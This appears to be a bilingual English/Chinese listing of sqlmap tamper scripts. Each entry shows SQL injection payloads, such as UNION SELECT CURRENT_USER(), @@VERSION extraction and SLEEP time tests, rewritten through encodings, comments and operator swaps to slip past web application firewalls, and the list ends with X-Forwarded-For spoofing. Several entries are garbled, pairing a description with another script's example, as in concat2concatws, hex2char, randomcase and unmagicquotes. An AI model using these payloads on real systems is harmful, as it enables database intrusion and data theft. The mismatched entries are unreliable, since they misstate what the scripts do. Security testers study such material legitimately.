>>> tamper("1' AND SLEEP(5)#")
'MScgQU5EIFNMRUVQKDUpIw=='
between.py
Replaces greater than operator ('>') with 'NOT BETWEEN 0 AND #' and equals operator ('=') with 'BETWEEN # AND #'
将 > 字符替换为 NOT BETWEEN 0 AND
将 = 字符替换为 BETWEEN # AND #
>>> tamper('1 AND A > B--')
'1 AND A NOT BETWEEN 0 AND B--'
>>> tamper('1 AND A = B--')
'1 AND A BETWEEN B AND B--'
>>> tamper('1 AND LAST_INSERT_ROWID()=LAST_INSERT_ROWID()')
'1 AND LAST_INSERT_ROWID() BETWEEN LAST_INSERT_ROWID() AND LAST_INSERT_ROWID()'
binary.py
Injects keyword binary where possible
Requirement:
MySQL
>>> tamper('1 UNION ALL SELECT NULL, NULL, NULL')
'1 UNION ALL SELECT binary NULL, binary NULL, binary NULL'
>>> tamper('1 AND 2>1')
'1 AND binary 2>binary 1'
>>> tamper('CASE WHEN (1=1) THEN 1 ELSE 0x28 END')
'CASE WHEN (binary 1=binary 1) THEN binary 1 ELSE binary 0x28 END'
bluecoat.py
Replaces the space character after a SQL statement with a valid random blank character. Afterwards, replaces the character '=' with the operator LIKE
将 sql 语句后的空格字符替换为 %09,LIKE 替换字符 =
Requirement:
Blue Coat SGOS with WAF activated as documented in https://kb.bluecoat.com/index?page=content&id=FAQ2147
Tested against:
MySQL 5.1, SGOS
>>> tamper('SELECT id FROM users WHERE id = 1')
'SELECT%09id FROM%09users WHERE%09id LIKE 1'
chardoubleencode.py
Double URL-encodes all characters in a given payload (not processing already encoded) (e.g. SELECT -> %2553%2545%254C%2545%2543%2554)
二次URL编码
>>> tamper('SELECT FIELD FROM%20TABLE')
'%2553%2545%254C%2545%2543%2554%2520%2546%2549%2545%254C%2544%2520%2546%2552%254F%254D%2520%2554%2541%2542%254C%2545'
charencode.py
URL-encodes all characters in a given payload (not processing already encoded) (e.g. SELECT -> %53%45%4C%45%43%54)
URL编码
Tested against:
Microsoft SQL Server 2005
MySQL 4, 5.0 and 5.5
Oracle 10g
PostgreSQL 8.3, 8.4, 9.0
>>> tamper('SELECT FIELD FROM%20TABLE')
'%53%45%4C%45%43%54%20%46%49%45%4C%44%20%46%52%4F%4D%20%54%41%42%4C%45'
charunicodeencode.py
Unicode-URL-encodes all characters in a given payload (not processing already encoded) (e.g. SELECT -> %u0053%u0045%u004C%u0045%u0043%u0054)
Unicode-escapes non-encoded characters in a given payload (not processing already encoded) (e.g. SELECT -> \u0053\u0045\u004C\u0045\u0043\u0054)
url 解码中的 % 换成 \\
>>> tamper('SELECT FIELD FROM TABLE')
'\\\\u0053\\\\u0045\\\\u004C\\\\u0045\\\\u0043\\\\u0054\\\\u0020\\\\u0046\\\\u0049\\\\u0045\\\\u004C\\\\u0044\\\\u0020\\\\u0046\\\\u0052\\\\u004F\\\\u004D\\\\u0020\\\\u0054\\\\u0041\\\\u0042\\\\u004C\\\\u0045'
commalesslimit.py
Replaces (MySQL) instances like 'LIMIT M, N' with 'LIMIT N OFFSET M' counterpart
替换字符的位置
Requirement:
MySQL
Tested against:
MySQL 5.0 and 5.5
>>> tamper('LIMIT 2, 3')
'LIMIT 3 OFFSET 2'
commalessmid.py
Replaces (MySQL) instances like 'MID(A, B, C)' with 'MID(A FROM B FOR C)' counterpart
用 'MID(A FROM B FOR C)' 代替 'MID(A, B, C)'
Requirement:
MySQL
Tested against:
MySQL 5.0 and 5.5
>>> tamper('MID(VERSION(), 1, 1)')
'MID(VERSION() FROM 1 FOR 1)'
commentbeforeparentheses.py
Prepends (inline) comment before parentheses (e.g. ( -> /**/()
在括号前添加内联注释
Tested against:
Microsoft SQL Server
MySQL
Oracle
PostgreSQL
>>> tamper('SELECT ABS(1)')
'SELECT ABS/**/(1)'
concat2concatws.py
Replaces (MySQL) instances like 'CONCAT(A, B)' with 'CONCAT_WS(MID(CHAR(0), 0, 0), A, B)' counterpart
>>> tamper('1 UNION ALL SELECT')
'1DUNION ALL SELECT'
equaltolike.py
Replaces all occurrences of operator equal ('=') with 'LIKE' counterpart
将 = 换成 LIKE
Tested against:
Microsoft SQL Server 2005
MySQL 4, 5.0 and 5.5
>>> tamper('SELECT * FROM users WHERE id=1')
'SELECT * FROM users WHERE id LIKE 1'
equaltorlike.py
Replaces all occurrences of operator equal ('=') with 'RLIKE' counterpart
将 = 换成 RLIKE
Tested against:
MySQL 4, 5.0 and 5.5
>>> tamper('SELECT * FROM users WHERE id=1')
'SELECT * FROM users WHERE id RLIKE 1'
escapequotes.py
Slash-escapes single and double quotes (e.g. ' -> \')
>>> tamper('1" AND SLEEP(5)#')
'1\\\\" AND SLEEP(5)#'
greatest.py
Replaces greater than operator ('>') with 'GREATEST' counterpart
使用 greatest 替换 >
Tested against:
MySQL 4, 5.0 and 5.5
Oracle 10g
PostgreSQL 8.3, 8.4, 9.0
>>> tamper('1 AND A > B')
'1 AND GREATEST(A,B+1)=A'
halfversionedmorekeywords.py
Adds (MySQL) versioned comment before each keyword
在每个关键词前添加(MySQL)的版本注释
Requirement:
MySQL < 5.1
Tested against:
MySQL 4.0.18, 5.0.22
>>> tamper("value' UNION ALL SELECT CONCAT(CHAR(58,107,112,113,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,97,110,121,58)), NULL, NULL# AND 'QDWa'='QDWa")
"value'/*!0UNION/*!0ALL/*!0SELECT/*!0CONCAT(/*!0CHAR(58,107,112,113,58),/*!0IFNULL(CAST(/*!0CURRENT_USER()/*!0AS/*!0CHAR),/*!0CHAR(32)),/*!0CHAR(58,97,110,121,58)),/*!0NULL,/*!0NULL#/*!0AND 'QDWa'='QDWa"
hex2char.py
Replaces each (MySQL) 0x encoded string with equivalent CONCAT(CHAR(),...) counterpart
>>> tamper('SELECT FIELD FROM TABLE WHERE 2>1')
'%C1%93%C1%85%C1%8C%C1%85%C1%83%C1%94%C0%A0%C1%86%C1%89%C1%85%C1%8C%C1%84%C0%A0%C1%86%C1%92%C1%8F%C1%8D%C0%A0%C1%94%C1%81%C1%82%C1%8C%C1%85%C0%A0%C1%97%C1%88%C1%85%C1%92%C1%85%C0%A0%C0%B2%C0%BE%C0%B1'
percentage.py
Adds a percentage sign ('%') in front of each character (e.g. SELECT -> %S%E%L%E%C%T)
在每一个字符前面添加一个百分比符号
Requirement:
ASP
Tested against:
Microsoft SQL Server 2000, 2005
MySQL 5.1.56, 5.5.11
PostgreSQL 9.0
>>> tamper('SELECT FIELD FROM TABLE')
'%S%E%L%E%C%T %F%I%E%L%D %F%R%O%M %T%A%B%L%E'
plus2concat.py
Replaces plus operator ('+') with (MsSQL) function CONCAT() counterpart
用对应的 (MsSQL) 函数 CONCAT() 代替加号运算符('+')。
Tested against:
Microsoft SQL Server 2012
Requirements:
Microsoft SQL Server 2012+
>>> tamper('SELECT CHAR(113)+CHAR(114)+CHAR(115) FROM DUAL')
'SELECT CONCAT(CHAR(113),CHAR(114),CHAR(115)) FROM DUAL'
>>> tamper('1 UNION ALL SELECT NULL,NULL,CHAR(113)+CHAR(118)+CHAR(112)+CHAR(112)+CHAR(113)+ISNULL(CAST(@@VERSION AS NVARCHAR(4000)),CHAR(32))+CHAR(113)+CHAR(112)+CHAR(107)+CHAR(112)+CHAR(113)-- qtfe')
'1 UNION ALL SELECT NULL,NULL,CONCAT(CHAR(113),CHAR(118),CHAR(112),CHAR(112),CHAR(113),ISNULL(CAST(@@VERSION AS NVARCHAR(4000)),CHAR(32)),CHAR(113),CHAR(112),CHAR(107),CHAR(112),CHAR(113))-- qtfe'
plus2fnconcat.py
Replaces plus operator ('+') with (MsSQL) ODBC function {fn CONCAT()} counterpart
>>> tamper('SELECT CHAR(113)+CHAR(114)+CHAR(115) FROM DUAL')
'SELECT {fn CONCAT({fn CONCAT(CHAR(113),CHAR(114))},CHAR(115))} FROM DUAL'
>>> tamper('1 UNION ALL SELECT NULL,NULL,CHAR(113)+CHAR(118)+CHAR(112)+CHAR(112)+CHAR(113)+ISNULL(CAST(@@VERSION AS NVARCHAR(4000)),CHAR(32))+CHAR(113)+CHAR(112)+CHAR(107)+CHAR(112)+CHAR(113)-- qtfe')
'1 UNION ALL SELECT NULL,NULL,{fn CONCAT({fn CONCAT({fn CONCAT({fn CONCAT({fn CONCAT({fn CONCAT({fn CONCAT({fn CONCAT({fn CONCAT({fn CONCAT(CHAR(113),CHAR(118))},CHAR(112))},CHAR(112))},CHAR(113))},ISNULL(CAST(@@VERSION AS NVARCHAR(4000)),CHAR(32)))},CHAR(113))},CHAR(112))},CHAR(107))},CHAR(112))},CHAR(113))}-- qtfe'
randomcase.py
Replaces each keyword character with random case value (e.g. SELECT -> SEleCt)
字符替换成大小写字符
Tested against:
Microsoft SQL Server 2005
MySQL 4, 5.0 and 5.5
Oracle 10g
PostgreSQL 8.3, 8.4, 9.0
SQLite 3
>>> import random
>>> random.seed(0)
>>> tamper('INSERT')
'InSeRt'
>>> tamper('f()')
'f()'
>>> tamper('function()')
'FuNcTiOn()'
>>> tamper('SELECT id FROM `user`')
'SeLeCt id FrOm `user`'
>>> random.seed(0)
>>> tamper('1 AND 9227=9227')
'1%23RcDKhIr%0AAND%23upgPydUzKpMX%0A%23lgbaxYjWJ%0A9227=9227'
space2mssqlblank.py
Replaces (MsSQL) instances of space character (' ') with a random blank character from a valid set of alternate characters
将(MsSQL)空格字符('')的实例替换为一个有效的备用字符集中的随机空白字符。
Requirement:
Microsoft SQL Server
Tested against:
Microsoft SQL Server 2000
Microsoft SQL Server 2005
>>> random.seed(0)
>>> tamper('SELECT id FROM users')
'SELECT%0Did%0DFROM%04users'
space2mssqlhash.py
Replaces space character (' ') with a pound character ('#') followed by a new line ('\n')
将空格替换成 %23%0A
Requirement:
MSSQL
MySQL
>>> tamper('1 AND 9227=9227')
'1%23%0AAND%23%0A9227=9227'
space2mysqlblank.py
Replaces (MySQL) instances of space character (' ') with a random blank character from a valid set of alternate characters
将(MySQL)空格字符('')的实例替换为有效替代字符集中的随机空白字符
Requirement:
MySQL
Tested against:
MySQL 5.1
>>> random.seed(0)
>>> tamper('SELECT id FROM users')
'SELECT%A0id%0CFROM%0Dusers'
space2mysqldash.py
Replaces space character (' ') with a dash comment ('--') followed by a new line ('\n')
用注释('--')代替空格字符(' '),后面是一个新行('\n')。
Requirement:
MySQL
MSSQL
>>> tamper('1 AND 9227=9227')
'1--%0AAND--%0A9227=9227'
space2plus.py
Replaces space character (' ') with plus ('+')
将空格替换成 +
>>> tamper('SELECT id FROM users')
'SELECT+id+FROM+users'
space2randomblank.py
Replaces space character (' ') with a random blank character from a valid set of alternate characters
用一组有效的备用字符中的随机空白字符替换空格字符('')。
Tested against:
Microsoft SQL Server 2005
MySQL 4, 5.0 and 5.5
Oracle 10g
PostgreSQL 8.3, 8.4, 9.0
>>> random.seed(0)
>>> tamper('SELECT id FROM users')
'SELECT%0Did%0CFROM%0Ausers'
substring2leftright.py
Replaces PostgreSQL SUBSTRING with LEFT and RIGHT
用 LEFT 和 RIGHT 取代 PostgreSQL 的 SUBSTRING
Tested against:
PostgreSQL 9.6.12
>>> tamper('SUBSTRING((SELECT usename FROM pg_user)::text FROM 1 FOR 1)')
'LEFT((SELECT usename FROM pg_user)::text,1)'
>>> tamper('SUBSTRING((SELECT usename FROM pg_user)::text FROM 3 FOR 1)')
'LEFT(RIGHT((SELECT usename FROM pg_user)::text,-2),1)'
symboliclogical.py
Replaces AND and OR logical operators with their symbolic counterparts (&& and ||)
将 and 和 or 的逻辑运算符分别替换为 (&& 和 ||)
>>> tamper("1 AND '1'='1")
"1 %26%26 '1'='1"
unionalltounion.py
Replaces instances of UNION ALL SELECT with UNION SELECT counterpart
将 union all select 替换成 union select
>>> tamper('-1 UNION ALL SELECT')
'-1 UNION SELECT'
unmagicquotes.py
Replaces quote character (') with a multi-byte combo %BF%27 together with generic comment at the end (to make it work)
Encloses each non-function keyword with (MySQL) versioned comment
Requirement:
MySQL
Tested against:
MySQL 4.0.18, 5.1.56, 5.5.11
>>> tamper('1 UNION ALL SELECT NULL, NULL, CONCAT(CHAR(58,104,116,116,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,100,114,117,58))#')
'1/*!UNION*//*!ALL*//*!SELECT*//*!NULL*/,/*!NULL*/, CONCAT(CHAR(58,104,116,116,58),IFNULL(CAST(CURRENT_USER()/*!AS*//*!CHAR*/),CHAR(32)),CHAR(58,100,114,117,58))#'
versionedmorekeywords.py
Encloses each keyword with (MySQL) versioned comment
Requirement:
MySQL >= 5.1.13
Tested against:
MySQL 5.1.56, 5.5.11
>>> tamper('1 UNION ALL SELECT NULL, NULL, CONCAT(CHAR(58,122,114,115,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,115,114,121,58))#')
'1/*!UNION*//*!ALL*//*!SELECT*//*!NULL*/,/*!NULL*/,/*!CONCAT*/(/*!CHAR*/(58,122,114,115,58),/*!IFNULL*/(CAST(/*!CURRENT_USER*/()/*!AS*//*!CHAR*/),/*!CHAR*/(32)),/*!CHAR*/(58,115,114,121,58))#'
xforwardedfor.py
Appends a fake HTTP header 'X-Forwarded-For' (and the like)